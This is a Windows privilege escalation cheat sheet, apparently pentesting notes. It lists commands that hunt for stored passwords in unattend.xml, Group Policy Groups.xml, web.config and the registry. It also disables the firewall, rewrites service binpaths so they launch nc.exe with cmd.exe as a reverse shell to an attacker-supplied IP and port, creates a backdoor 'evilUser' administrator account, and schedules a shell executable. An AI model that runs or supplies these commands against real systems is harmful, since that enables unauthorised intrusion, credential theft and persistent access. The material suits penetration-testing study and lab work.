Windows Privilege Escalation

  1. Kernel Exploits
    1. Common Kernel Exploits
  2. Credentials
    1. Config Files
    2. Other Files
    3. IIS Web Server
    4. Group Policy Preferences
    5. Other Misc Passwords
    6. Find Potential Password Files
    7. Find Potential Passwords
  3. Firewall
  4. Misc
    1. PuTTY
    2. TightVNC
  5. Unquoted Services Paths
  6. Insecure Service Permissions
  7. Tasks
    1. Scheduled Tasks
    2. Link Running Tasks to Services
    3. Create Task
  8. Windows Services
    1. Query Services Permissions
    2. Managing or Manipulating Services
  9. Quick Useful Commands

Kernel Exploits

Look for missing KBs (Microsoft Knowledge Base - updates), find the most recent one, Google it. Then, look for exploits that effect later versions.

  • systeminfo
  • systeminfo | findstr /B /C:"OS Name" /C:"OS * Version"
  • sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

Common Kernel Exploits

MS17-010 - EternalBlue MS16-014 - Applies to: Windows 7 SP1 x86 MS16-016 - 'WebDAV' applies to Windows 7 SP1 x86 (Build 7601) MS16-032 - Applies to: Windows 7 x86/x64, Windows 8 x86/64, Windows 10, Windows Server 2008-2012 R2

Credentials

Config Files

  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml
  • C:\unattend.xml
  • %WINDIR%\Panther\Unattend.xml
  • %WINDIR%\Panther\Unattend\Unattend.xml

Other Files

  • Services\Services.xml
  • ScheduldedTasks\ScheduledTasks.xml
  • Printers\Printers.xml
  • Drives\Drives.xml
  • DataSources\DataSources.xml

IIS Web Server

Internet Information Services (IIS) web.config

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
  • C:\inetpub\wwwroot\web.config

Group Policy Preferences

Local administrators passwords can be found in the Group Policy Preferences. The file Groups.xml which contains the password is cached locally but it can also be obtained from the Domain Controller as every domain user has read-access for this file. The password is encrypted with AES but Microsoft has released the key.

  • C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml
  • \\{name}\SYSVOL\\Policies\{id}\MACHINE\Preferences\Groups\Groups.xml

Other Misc Passwords

  • reg query HKLM /f password /t REG_SZ /s
  • reg query HKCU /f password /t REG_SZ /s
  • php.ini
  • httpd.conf
  • access.log

Find Potential Password Files

From C:\ level:

  • dir /b /s unattend.xml
  • dir /b /s web.config
  • dir /b /s sysprep.inf
  • dir /b /s sysprep.xml
  • dir /b /s *pass*
  • dir /b /s vnc.ini
  • dir /s *pass* == *cred* == *vnc* == *.config*

Find Potential Passwords

Search through files for the word 'password'

  • findstr /si password *.txt
  • findstr /si password *.xml
  • findstr /si password *.ini
  • findstr /si password *.xml *.ini *.txt

Firewall

Show Firewall Config

netsh firewall show config
netsh firewall show opmode

Disable Firewall

netsh firewall set opmode disable

Misc

PuTTY

  • reg query HKEY_CURRENT_USER\Software\JohnDoe\PuTTY\Sessions

TightVNC

  • reg query HKCU\Software\TightVNC\Server
  • bncpwd.exe <encrypted_password>

Unquoted Services Paths

For each space in a file path, Windows will attempt to look for and execute programs with a name that matches the word in front of the space.

Example:

  • C:\Program Files\Some Folder\Service.exe
  • C:\Program.exe
  • C:\Program Files\Some.exe
  • C:\Program Files\Some Folder\Service.exe
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Insecure Service Permissions

  • whoami > net user <name> - enumerate groups

  • accesschk.exe -> part of sysinternals

  • accesschk.exe -ucqv <service name>
  • accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Write access to a service as authenticated user?

Windows XP ssdprsv and upnphost by default:

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
net start upnphost

Tasks

Scheduled Tasks

On server 2000, 2003, and XP, scheduled tasks are running as system. Are they calling any '.exe' files that are overwritable?

accesschk.exe -dqv <folder path>

Scheduled Tasks

schtasks /query /fo LIST /v

tasklist /SVC

Create Task

net start "Task Scheduler" at <hour:minute> /interactive "path to shell.exe"`

Windows Services

Query Services Permissions

  • sc qc Spooler - queries spooler service
  • accesschk.exe /accepteula -ucqv Spooler (or accesschk_v5.02.exe on older machines like Windows XP SP1)
  • accesschk.exe /accepteula -uwcqv "Authenticated Users"

Managing or Manipulating Services

  • sc qc <service>
  • sc config <service> binpath= "C:\nc.exe -nv <myip> <myport> -e cmd.exe"
  • sc config <service> obj= ".\LocalSystem" password= ""
  • sc qc <service>
  • sc start <service>

Quick Useful Commands

  • hostname
  • echo %username%
  • whoami / priv
  • swinsta - Other logged in users
  • net users
  • net user <username>
  • net localgroup
  • net localgroup Administrators
  • net user evilUser password123 /add
  • net localgroup Administrators evilUser /add
  • ipconfing /all
  • route print
  • arp -a
  • netstat -ano
  • C:\WINDOWS\System32\drivers\etc\hosts
  • DRIVERQUERY - Installed drivers
  • schtasks /query /fo LIST /v - Scheduled tasks
  • tasklist /SVC - Running processes
  • net start - Started services

results matching ""

    No results matching ""